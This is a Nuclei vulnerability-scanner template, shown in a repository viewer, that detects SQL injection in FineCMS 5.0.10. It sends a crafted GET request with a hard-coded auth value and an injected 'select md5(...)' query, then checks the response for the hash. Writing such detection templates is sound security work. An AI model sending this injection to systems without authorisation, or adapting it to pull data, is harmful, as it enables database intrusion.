nuclei-templates/vulnerabilities/other/finecms-sqli.yaml

25 lines
548 B
YAML
Raw Normal View History

2022-06-10 13:58:24 +00:00
id: finecms-sqli
info:
name: FineCMS 5.0.10 - SQL Injection
author: ritikchaddha
severity: high
description: |
SQL Injection exists in FineCMS 5.0.10.
reference:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
tags: finecms,sqli
2022-06-30 03:00:16 +00:00
variables:
num: "999999999"
2022-06-10 13:58:24 +00:00
requests:
- method: GET
path:
2022-06-30 03:00:16 +00:00
- '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27'
2022-06-10 13:58:24 +00:00
matchers:
- type: word
words:
2022-06-30 03:00:16 +00:00
- '{{md5({{num}})}}'